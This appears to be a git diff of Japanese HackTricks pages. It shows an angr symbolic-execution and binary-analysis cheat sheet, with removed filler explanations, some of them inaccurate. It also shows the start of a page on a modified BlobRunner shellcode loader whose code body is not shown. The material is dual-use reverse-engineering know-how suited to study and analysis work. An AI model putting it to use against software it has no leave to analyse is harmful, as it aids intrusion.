# 基本的なアクション
|
||||
|
||||
## Load Binary
|
||||
|
||||
### Load a binary into an angr project
|
||||
|
||||
### angrプロジェクトにバイナリをロードする
|
||||
|
||||
```python
|
||||
import angr
|
||||
|
||||
proj = angr.Project("/path/to/binary")
|
||||
```
|
||||
|
||||
## Find Functions
|
||||
|
||||
### Find all functions in the binary
|
||||
|
||||
### バイナリ内のすべての関数を見つける
|
||||
|
||||
```python
|
||||
cfg = proj.analyses.CFGFast()
|
||||
functions = cfg.functions
|
||||
```
|
||||
|
||||
## Find Basic Blocks
|
||||
|
||||
### Find all basic blocks in a function
|
||||
|
||||
### 関数内のすべての基本ブロックを見つける
|
||||
|
||||
```python
|
||||
function = cfg.functions["function_name"]
|
||||
basic_blocks = function.blocks
|
||||
```
|
||||
|
||||
## Find Instructions
|
||||
|
||||
### Find all instructions in a basic block
|
||||
|
||||
### 基本ブロック内のすべての命令を見つける
|
||||
|
||||
```python
|
||||
basic_block = function.blocks[0]
|
||||
instructions = basic_block.instructions
|
||||
```
|
||||
|
||||
## Symbolic Execution
|
||||
|
||||
### Perform symbolic execution on a basic block
|
||||
|
||||
### 基本ブロック上でシンボリック実行を行う
|
||||
|
||||
```python
|
||||
state = proj.factory.entry_state()
|
||||
simgr = proj.factory.simgr(state)
|
||||
simgr.explore(find=0xdeadbeef, avoid=0xcafebabe)
|
||||
```
|
||||
|
||||
## Path Exploration
|
||||
|
||||
### Explore all possible paths in a binary
|
||||
|
||||
### バイナリ内のすべての可能なパスを探索する
|
||||
|
||||
```python
|
||||
state = proj.factory.entry_state()
|
||||
simgr = proj.factory.simgr(state)
|
||||
simgr.explore()
|
||||
```
|
||||
|
||||
## Constraint Solving
|
||||
|
||||
### Solve constraints using angr's symbolic expressions
|
||||
|
||||
### angrのシンボリック式を使用して制約を解決する
|
||||
|
||||
```python
|
||||
state = proj.factory.entry_state()
|
||||
solver = state.solver
|
||||
solution = solver.eval(expr, cast_to=str)
|
||||
```
|
||||
|
||||
## Patching Binaries
|
||||
|
||||
### Patch a binary with new instructions
|
||||
|
||||
### 新しい命令でバイナリをパッチする
|
||||
|
||||
```python
|
||||
proj.hook(0xdeadbeef, angr.SIM_PROCEDURES['stubs']['ReturnUnconstrained']())
|
||||
```
|
||||
```python
|
||||
import angr
|
||||
import monkeyhex # this will format numerical results in hexadecimal
|
||||
|
@ -132,17 +39,9 @@ proj.filename #Get filename "/bin/true"
|
|||
#Usually you won't need to use them but you could
|
||||
angr.Project('examples/fauxware/fauxware', main_opts={'backend': 'blob', 'arch': 'i386'}, lib_opts={'libc.so.6': {'backend': 'elf'}})
|
||||
```
|
||||
# 読み込まれたデータ
|
||||
# ロードされたデータとメインオブジェクト情報
|
||||
|
||||
The loaded data refers to the information that is loaded into the memory when a program is executed. This can include variables, functions, libraries, and other resources that are necessary for the program to run.
|
||||
|
||||
読み込まれたデータとは、プログラムが実行される際にメモリに読み込まれる情報のことを指します。これには、変数、関数、ライブラリ、およびプログラムの実行に必要なその他のリソースが含まれる場合があります。
|
||||
|
||||
## Main Object
|
||||
|
||||
The main object is the entry point of a program. It is the first function that is executed when the program starts running. The main object typically contains the program's initialization code and calls other functions as needed.
|
||||
|
||||
メインオブジェクトは、プログラムのエントリーポイントです。プログラムが実行されるときに最初に実行される関数です。メインオブジェクトには通常、プログラムの初期化コードが含まれ、必要に応じて他の関数を呼び出します。
|
||||
## ロードされたデータ
|
||||
```python
|
||||
#LOADED DATA
|
||||
proj.loader #<Loaded true, maps [0x400000:0x5004000]>
|
||||
|
@ -165,117 +64,7 @@ proj.loader.all_elf_objects #Get all ELF objects loaded (Linux)
|
|||
proj.loader.all_pe_objects #Get all binaries loaded (Windows)
|
||||
proj.loader.find_object_containing(0x400000)#Get object loaded in an address "<ELF Object fauxware, maps [0x400000:0x60105f]>"
|
||||
```
|
||||
## メインオブジェクト
|
||||
|
||||
The main object in angr is the `Project` class. It represents the binary being analyzed and provides various methods and attributes for performing analysis and manipulation.
|
||||
|
||||
angrのメインオブジェクトは`Project`クラスです。これは解析されるバイナリを表し、解析や操作を行うためのさまざまなメソッドと属性を提供します。
|
||||
|
||||
## Loading a Binary
|
||||
|
||||
To create a `Project` object, you need to provide the path to the binary file you want to analyze. You can do this using the `angr.Project()` constructor.
|
||||
|
||||
バイナリを解析するために`Project`オブジェクトを作成するには、解析したいバイナリファイルへのパスを指定する必要があります。これは`angr.Project()`コンストラクタを使用して行うことができます。
|
||||
|
||||
```python
|
||||
import angr
|
||||
|
||||
# Load the binary
|
||||
project = angr.Project('/path/to/binary')
|
||||
```
|
||||
|
||||
```python
|
||||
import angr
|
||||
|
||||
# バイナリをロードする
|
||||
project = angr.Project('/path/to/binary')
|
||||
```
|
||||
|
||||
## Exploring the Binary
|
||||
|
||||
Once you have loaded the binary, you can explore its properties and perform various analysis tasks. Some of the commonly used methods and attributes of the `Project` class are:
|
||||
|
||||
バイナリをロードしたら、そのプロパティを調査し、さまざまな解析タスクを実行することができます。`Project`クラスの一部のよく使用されるメソッドと属性は次のとおりです。
|
||||
|
||||
- `project.arch`: The architecture of the binary.
|
||||
- `project.entry`: The entry point address of the binary.
|
||||
- `project.loader`: The loader object that provides access to the binary's sections, symbols, and other information.
|
||||
- `project.factory`: The factory object that provides methods for creating various analysis objects, such as `project.factory.block()` for creating basic blocks.
|
||||
|
||||
- `project.arch`: バイナリのアーキテクチャ。
|
||||
- `project.entry`: バイナリのエントリポイントアドレス。
|
||||
- `project.loader`: バイナリのセクション、シンボル、およびその他の情報にアクセスするためのローダーオブジェクト。
|
||||
- `project.factory`: 基本ブロックを作成するための`project.factory.block()`など、さまざまな解析オブジェクトを作成するためのメソッドを提供するファクトリーオブジェクト。
|
||||
|
||||
## Symbolic Execution
|
||||
|
||||
One of the powerful features of angr is its support for symbolic execution. Symbolic execution allows you to explore all possible paths through a binary by treating inputs as symbolic variables. This can be useful for finding vulnerabilities, understanding program behavior, and generating test cases.
|
||||
|
||||
angrの強力な機能の1つは、シンボリック実行のサポートです。シンボリック実行により、入力をシンボリック変数として扱い、バイナリを通過するすべての可能なパスを探索することができます。これは脆弱性の発見、プログラムの動作の理解、テストケースの生成に役立ちます。
|
||||
|
||||
To perform symbolic execution, you can use the `project.factory.simulation_manager()` method to create a `SimulationManager` object. The `SimulationManager` object allows you to explore different paths through the binary and collect information about the program state at each path.
|
||||
|
||||
シンボリック実行を行うには、`project.factory.simulation_manager()`メソッドを使用して`SimulationManager`オブジェクトを作成します。`SimulationManager`オブジェクトを使用すると、バイナリを通過するさまざまなパスを探索し、各パスでのプログラムの状態に関する情報を収集することができます。
|
||||
|
||||
```python
|
||||
import angr
|
||||
|
||||
# Load the binary
|
||||
project = angr.Project('/path/to/binary')
|
||||
|
||||
# Create a SimulationManager object
|
||||
sim_manager = project.factory.simulation_manager()
|
||||
|
||||
# Explore the binary
|
||||
sim_manager.explore()
|
||||
```
|
||||
|
||||
```python
|
||||
import angr
|
||||
|
||||
# バイナリをロードする
|
||||
project = angr.Project('/path/to/binary')
|
||||
|
||||
# SimulationManagerオブジェクトを作成する
|
||||
sim_manager = project.factory.simulation_manager()
|
||||
|
||||
# バイナリを探索する
|
||||
sim_manager.explore()
|
||||
```
|
||||
|
||||
## Analyzing Program State
|
||||
|
||||
During symbolic execution, you can analyze the program state at each path to gather information about the program's behavior. Some of the commonly used methods and attributes of the `SimulationManager` class are:
|
||||
|
||||
シンボリック実行中に、各パスでプログラムの状態を分析してプログラムの動作に関する情報を収集することができます。`SimulationManager`クラスの一部のよく使用されるメソッドと属性は次のとおりです。
|
||||
|
||||
- `sim_manager.active`: A list of active states, representing the current program state at each path.
|
||||
- `sim_manager.deadended`: A list of deadended states, representing the program states that have reached an exit point.
|
||||
- `sim_manager.stashes`: A dictionary of stashes, which can be used to organize and manage states.
|
||||
|
||||
- `sim_manager.active`: アクティブな状態のリストで、各パスの現在のプログラムの状態を表します。
|
||||
- `sim_manager.deadended`: 終了ポイントに到達したプログラムの状態を表す、終了した状態のリスト。
|
||||
- `sim_manager.stashes`: 状態を整理管理するために使用できるスタッシュの辞書。
|
||||
|
||||
## Manipulating Program State
|
||||
|
||||
In addition to analyzing program state, angr allows you to manipulate the program state to guide the analysis or explore specific behaviors. Some of the commonly used methods and attributes for manipulating program state are:
|
||||
|
||||
プログラムの状態を分析するだけでなく、angrではプログラムの状態を操作して解析を誘導したり、特定の動作を探索したりすることができます。プログラムの状態を操作するための一部のよく使用されるメソッドと属性は次のとおりです。
|
||||
|
||||
- `state.solver`: The solver object associated with a state, which can be used to solve constraints and perform symbolic operations.
|
||||
- `state.memory`: The memory object associated with a state, which can be used to read from and write to memory.
|
||||
- `state.regs`: The register object associated with a state, which can be used to read from and write to registers.
|
||||
|
||||
- `state.solver`: 状態に関連付けられたソルバーオブジェクトで、制約を解決したりシンボリック操作を実行したりするために使用できます。
|
||||
- `state.memory`: 状態に関連付けられたメモリオブジェクトで、メモリから読み取りや書き込みを行うために使用できます。
|
||||
- `state.regs`: 状態に関連付けられたレジスタオブジェクトで、レジスタへの読み取りや書き込みを行うために使用できます。
|
||||
|
||||
## Conclusion
|
||||
|
||||
This is just a brief introduction to the basic methods and concepts in angr. There are many more advanced features and techniques that can be explored. The angr documentation and examples provide more detailed information on how to use angr for various analysis tasks.
|
||||
|
||||
これはangrの基本的なメソッドと概念の簡単な紹介です。さらに詳細な情報やさまざまな解析タスクにangrを使用する方法については、angrのドキュメントと例を参照してください。
|
||||
## 主な目的
|
||||
```python
|
||||
#Main Object (main binary loaded)
|
||||
obj = proj.loader.main_object #<ELF Object true, maps [0x400000:0x60721f]>
|
||||
|
@ -290,38 +79,6 @@ obj.plt['strcmp'] #Get plt address of a funcion (0x400550)
|
|||
obj.reverse_plt[0x400550] #Get function from plt address ('strcmp')
|
||||
```
|
||||
## シンボルとリロケーション
|
||||
|
||||
Symbols and relocations are important concepts in reverse engineering and binary analysis. They provide valuable information about the structure and functionality of a binary executable.
|
||||
|
||||
シンボルとリロケーションは、リバースエンジニアリングとバイナリ解析において重要な概念です。これらは、バイナリ実行ファイルの構造と機能に関する貴重な情報を提供します。
|
||||
|
||||
### Symbols
|
||||
|
||||
シンボル
|
||||
|
||||
Symbols are identifiers used to represent various entities in a binary executable, such as functions, variables, and data structures. They serve as references to specific memory locations or code sections within the binary.
|
||||
|
||||
シンボルは、バイナリ実行ファイル内のさまざまなエンティティ(関数、変数、データ構造など)を表すために使用される識別子です。これらは、バイナリ内の特定のメモリ位置やコードセクションへの参照として機能します。
|
||||
|
||||
Symbols can be either global or local. Global symbols are accessible from other parts of the binary, while local symbols are only visible within their respective code sections.
|
||||
|
||||
シンボルは、グローバルまたはローカルのいずれかになります。グローバルシンボルは、バイナリの他の部分からアクセスできますが、ローカルシンボルは、それぞれのコードセクション内でのみ表示されます。
|
||||
|
||||
### Relocations
|
||||
|
||||
リロケーション
|
||||
|
||||
Relocations are instructions or records that specify how to modify the binary's code or data during the linking process. They are used to resolve references to symbols that are not yet known at compile time.
|
||||
|
||||
リロケーションは、リンクプロセス中にバイナリのコードやデータをどのように修正するかを指定する命令またはレコードです。これらは、コンパイル時にはまだ不明なシンボルへの参照を解決するために使用されます。
|
||||
|
||||
Relocations are typically stored in a separate section of the binary called the relocation section. During the linking process, the linker will use the relocation information to adjust the addresses of symbols and ensure that all references are resolved correctly.
|
||||
|
||||
リロケーションは通常、リロケーションセクションと呼ばれるバイナリの別のセクションに格納されます。リンクプロセス中、リンカはリロケーション情報を使用してシンボルのアドレスを調整し、すべての参照が正しく解決されるようにします。
|
||||
|
||||
Understanding symbols and relocations is crucial for analyzing and modifying binary executables. By examining these elements, reverse engineers can gain insights into the inner workings of a program and identify potential vulnerabilities or areas for improvement.
|
||||
|
||||
シンボルとリロケーションの理解は、バイナリ実行ファイルの解析と修正において重要です。これらの要素を調査することで、リバースエンジニアはプログラムの内部動作を理解し、潜在的な脆弱性や改善の余地を特定することができます。
|
||||
```python
|
||||
strcmp = proj.loader.find_symbol('strcmp') #<Symbol "strcmp" in libc.so.6 at 0x1089cd0>
|
||||
|
||||
|
@ -339,30 +96,6 @@ main_strcmp.is_import #True
|
|||
main_strcmp.resolvedby #<Symbol "strcmp" in libc.so.6 at 0x1089cd0>
|
||||
```
|
||||
## ブロック
|
||||
|
||||
### Basic Blocks
|
||||
|
||||
基本ブロックは、プログラムの実行中に連続して実行される命令のシーケンスです。基本ブロックは、制御フローグラフ内のノードとして表されます。基本ブロックは、単一の入力と単一の出力を持ち、通常は最初の命令から最後の命令まで直線的に実行されます。
|
||||
|
||||
### Super Blocks
|
||||
|
||||
スーパーブロックは、基本ブロックの集合です。スーパーブロックは、複数の基本ブロックを含むことができますが、制御フローグラフ内の単一のノードとして表されます。スーパーブロックは、複数の入力と複数の出力を持つことができます。
|
||||
|
||||
### Function Blocks
|
||||
|
||||
関数ブロックは、関数内のすべての基本ブロックを含むスーパーブロックです。関数ブロックは、関数の制御フローグラフ内の単一のノードとして表されます。関数ブロックは、関数の入力と出力を持つことができます。
|
||||
|
||||
### Exception Blocks
|
||||
|
||||
例外ブロックは、例外処理のために使用される特殊なブロックです。例外ブロックは、例外が発生した場合に制御フローが移動する場所を示します。例外ブロックは、通常、try-catch文や例外ハンドラ内のコードの一部として表されます。
|
||||
|
||||
### Loop Blocks
|
||||
|
||||
ループブロックは、ループ構造を表すブロックです。ループブロックは、ループ内の基本ブロックの集合として表されます。ループブロックは、ループの制御フローグラフ内の単一のノードとして表されます。
|
||||
|
||||
### Conditional Blocks
|
||||
|
||||
条件ブロックは、条件分岐を表すブロックです。条件ブロックは、条件分岐の各パスに対応する基本ブロックの集合として表されます。条件ブロックは、条件分岐の制御フローグラフ内の単一のノードとして表されます。
|
||||
```python
|
||||
#Blocks
|
||||
block = proj.factory.block(proj.entry) #Get the block of the entrypoint fo the binary
|
||||
|
@ -370,15 +103,9 @@ block.pp() #Print disassembly of the block
|
|||
block.instructions #"0xb" Get number of instructions
|
||||
block.instruction_addrs #Get instructions addresses "[0x401670, 0x401672, 0x401675, 0x401676, 0x401679, 0x40167d, 0x40167e, 0x40167f, 0x401686, 0x40168d, 0x401694]"
|
||||
```
|
||||
# シミュレーションマネージャー、ステート
|
||||
# ダイナミック解析
|
||||
|
||||
シミュレーションマネージャーは、angrの中核的なコンポーネントであり、バイナリの実行をシミュレートするために使用されます。シミュレーションマネージャーは、バイナリの実行を制御し、異なるステート(状態)を管理します。
|
||||
|
||||
ステートは、バイナリの実行時の特定の状態を表します。ステートには、レジスタの値、メモリの内容、フラグの状態など、バイナリの実行に関連する情報が含まれます。
|
||||
|
||||
シミュレーションマネージャーは、複数のステートを管理し、それらを適切な方法で制御します。これにより、異なるパスを探索し、バイナリの実行のさまざまな側面を分析することができます。
|
||||
|
||||
ステートの作成や変更、制御フローの解析など、さまざまな操作を実行するために、angrは強力なAPIを提供しています。これにより、バイナリの解析やリバースエンジニアリングのプロセスを効率化することができます。
|
||||
## シミュレーションマネージャー、ステート
|
||||
```python
|
||||
#Live States
|
||||
#This is useful to modify content in a live analysis
|
||||
|
@ -403,11 +130,11 @@ simgr.active[0].regs.rip #Get RIP from the last state
|
|||
```
|
||||
## 関数の呼び出し
|
||||
|
||||
* `args`を介して引数のリストと`env`を介して環境変数の辞書を`entry_state`と`full_init_state`に渡すことができます。これらの構造体の値は、文字列またはビットベクトルであることができ、シミュレートされた実行の引数と環境として状態にシリアライズされます。デフォルトの`args`は空のリストですので、解析しているプログラムが少なくとも`argv[0]`を見つけることを期待している場合は、常にそれを提供する必要があります!
|
||||
* `argc`をシンボリックにしたい場合は、`entry_state`と`full_init_state`のコンストラクタにシンボリックなビットベクトルとして`argc`を渡すことができます。ただし、注意してください。これを行う場合は、`args`に渡した引数の数よりも大きい値にならないように、結果の状態に制約を追加する必要があります。
|
||||
* コールステートを使用するには、`.call_state(addr, arg1, arg2, ...)`と呼び出す必要があります。ここで、`addr`は呼び出したい関数のアドレスであり、`argN`はその関数のN番目の引数です。これは、Pythonの整数、文字列、配列、またはビットベクトルとして指定できます。オブジェクトにポインタを割り当てて実際に渡す場合は、PointerWrapperでラップする必要があります。例えば、`angr.PointerWrapper("point to me!")`です。このAPIの結果は少し予測できないことがありますが、改善に取り組んでいます。
|
||||
* `args`を通じて引数のリストを、`env`を通じて環境変数の辞書を`entry_state`や`full_init_state`に渡すことができます。これらの構造体の値は文字列またはビットベクターであり、シミュレートされた実行の引数と環境として状態にシリアライズされます。デフォルトの`args`は空のリストなので、分析しているプログラムが少なくとも`argv[0]`を期待している場合は、常にそれを提供するべきです!
|
||||
* `argc`をシンボリックにしたい場合は、シンボリックビットベクターを`entry_state`や`full_init_state`のコンストラクターに`argc`として渡すことができます。ただし注意が必要です:これを行う場合は、`args`に渡した引数の数よりもargcの値が大きくないことを保証する制約を結果の状態に追加するべきです。
|
||||
* コールステートを使用するには、`.call_state(addr, arg1, arg2, ...)`と呼び出すべきです。ここで`addr`は呼び出したい関数のアドレスであり、`argN`はその関数へのN番目の引数です。これはPythonの整数、文字列、配列、またはビットベクターとして、またはオブジェクトへのポインターを実際に渡すためにメモリを割り当てたい場合は、それをPointerWrapperでラップするべきです。つまり`angr.PointerWrapper("point to me!")`のようにします。このAPIの結果は少し予測不可能かもしれませんが、改善に取り組んでいます。
|
||||
|
||||
## ビットベクトル
|
||||
## ビットベクター
|
||||
```python
|
||||
#BitVectors
|
||||
state = proj.factory.entry_state()
|
||||
|
@ -417,14 +144,6 @@ bv.zero_extend(30) #Will add 30 zeros on the left of the bitvector
|
|||
bv.sign_extend(30) #Will add 30 zeros or ones on the left of the BV extending the sign
|
||||
```
|
||||
## シンボリックビットベクトルと制約
|
||||
|
||||
シンボリックビットベクトルは、バイナリコードの解析において非常に重要な役割を果たします。シンボリックビットベクトルは、具体的な値ではなく、論理的な制約を表すビットの集合です。これにより、プログラムの実行パスに関する制約を表現することができます。
|
||||
|
||||
制約は、プログラムの実行中に特定の条件が満たされる必要があることを示します。例えば、ある変数が特定の値に等しい必要がある場合、その変数に対する制約を設定することができます。シンボリックビットベクトルを使用すると、プログラムの実行パスに関する制約を表現し、解析することができます。
|
||||
|
||||
シンボリックビットベクトルと制約を使用すると、プログラムの実行パスを制御することができます。これにより、特定の条件下でのプログラムの挙動を分析することができます。また、シンボリックビットベクトルを使用することで、プログラムの実行パスに関する制約を解決し、具体的な入力値を見つけることもできます。
|
||||
|
||||
シンボリックビットベクトルと制約は、逆アセンブリやバイナリ解析において非常に強力なツールです。これらのツールを使用することで、プログラムの内部の動作を理解し、脆弱性を特定することができます。
|
||||
```python
|
||||
x = state.solver.BVS("x", 64) #Symbolic variable BV of length 64
|
||||
y = state.solver.BVS("y", 64)
|
||||
|
@ -458,19 +177,7 @@ solver.eval_exact(expression, n) #n solutions to the given expression, throwing
|
|||
solver.min(expression) #minimum possible solution to the given expression.
|
||||
solver.max(expression) #maximum possible solution to the given expression.
|
||||
```
|
||||
## フック
|
||||
|
||||
フックは、プログラムの実行中に特定の関数やイベントを監視し、それらに対してカスタムコードを実行する技術です。フックは、リバースエンジニアリングやマルウェア分析などの様々なセキュリティ関連のタスクで使用されます。
|
||||
|
||||
フックの一般的な使用例は、関数フックです。関数フックは、特定の関数が呼び出されるたびに、カスタムコードを実行することができます。これにより、関数の引数や戻り値を監視したり、関数の動作を変更したりすることができます。
|
||||
|
||||
フックの実装方法はいくつかありますが、一般的な方法は以下の通りです。
|
||||
|
||||
1. フック関数を定義します。この関数は、フックしたい関数と同じシグネチャを持つ必要があります。
|
||||
2. フック関数をターゲット関数にフックします。これにより、ターゲット関数が呼び出されるたびに、フック関数が実行されます。
|
||||
3. フック関数内で必要な処理を実装します。これには、引数や戻り値の監視、変更、または追加の処理などが含まれます。
|
||||
|
||||
フックは、プログラムの実行中に動的に適用されるため、デバッグや解析のために非常に便利です。また、フックを使用することで、既存のプログラムの動作を変更することも可能です。しかし、フックは悪意のある目的で使用されることもあるため、注意が必要です。
|
||||
## フッキング
|
||||
```python
|
||||
>>> stub_func = angr.SIM_PROCEDURES['stubs']['ReturnUnconstrained'] # this is a CLASS
|
||||
>>> proj.hook(0x10000, stub_func()) # hook with an instance of the class
|
||||
|
@ -488,22 +195,22 @@ True
|
|||
>>> proj.is_hooked(0x20000)
|
||||
True
|
||||
```
|
||||
さらに、`proj.hook_symbol(name, hook)`を使用することで、最初の引数としてシンボルの名前を指定し、シンボルが存在するアドレスにフックを設定することができます。
|
||||
```
|
||||
さらに、`proj.hook_symbol(name, hook)` を使用して、第一引数にシンボルの名前を指定し、そのシンボルが存在するアドレスにフックをかけることができます。
|
||||
|
||||
# 例
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) および [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,22 +1,20 @@
|
|||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社で働いていますか?** **HackTricksで会社を宣伝したいですか**?または、**PEASSの最新バージョンにアクセスしたいですか**、または**HackTricksをPDFでダウンロードしたいですか**?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください、私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私を**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するために、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい場合**、または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
オリジナルコード(https://github.com/OALabs/BlobRunner)から変更されたのは10行目だけです。
|
||||
**Visual Studio CodeでC/C++プロジェクトを作成し、コードをコピーして貼り付け、ビルド**するだけでコンパイルできます。
|
||||
[元のコード](https://github.com/OALabs/BlobRunner)から変更された唯一の行は10行目です。
|
||||
コンパイルするには、**Visual Studio CodeでC/C++プロジェクトを作成し、コードをコピーして貼り付けてビルドする**だけです。
|
||||
```c
|
||||
#include <stdio.h>
|
||||
#include <windows.h>
|
||||
|
@ -222,16 +220,14 @@ return 0;
|
|||
```
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい場合**、または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
